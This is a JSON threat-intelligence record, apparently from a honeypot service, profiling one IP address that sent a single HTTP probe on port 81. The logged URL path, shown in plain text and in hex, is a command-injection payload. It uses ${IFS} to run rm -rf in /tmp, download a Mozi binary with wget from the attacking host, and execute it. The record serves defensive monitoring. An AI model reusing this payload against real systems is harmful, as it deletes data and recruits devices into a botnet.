{"ip":"153.117.15.75","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-06-28T00:49:16","last_seen":"2026-06-28T00:49:16","events_24h":0,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Punjab","city":"Lahore","lat":31.558,"lon":74.3587,"asn":9541,"org":"Cyber Internet Services (Pvt) Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as9541","label":"Cyber Internet Services","category":"isp","url":"https://www.peeringdb.com/asn/9541"},"cve_matches":[],"top_ports":[{"port":81,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":1855},"user_agents":[],"timeline":[{"date":"2026-06-28","count":1}],"recent_events":[{"timestamp":"2026-06-28T00:49:16","port":81,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://153.117.15.75:41179/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js","summary":"","payload_hex":"474554202f6c616e67756167652f53776564697368247b4946537d26266364247b4946537d2f746d703b726d247b4946537d2d7266247b4946537d2a3b77676574247b4946537d687474703a2f2f3135332e3131372e31352e37353a34313137392f4d6f7a692e613b7368247b4946537d2f746d702f4d6f7a692e61263e722626746172247b4946537d2f737472696e672e6a7320485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:qvGyu51pG0nD+DzGbvIP9Bsu1LI=","ja3":"","session":"c834b613-f4d6-4fda-aa40-078dcca9867a","seq":1,"duration_ms":100,"bytes_in":161,"bytes_out":78}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://153.117.15.75:41179/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[],"data_as_of":"2026-06-29T21:07:08.220678+00:00"}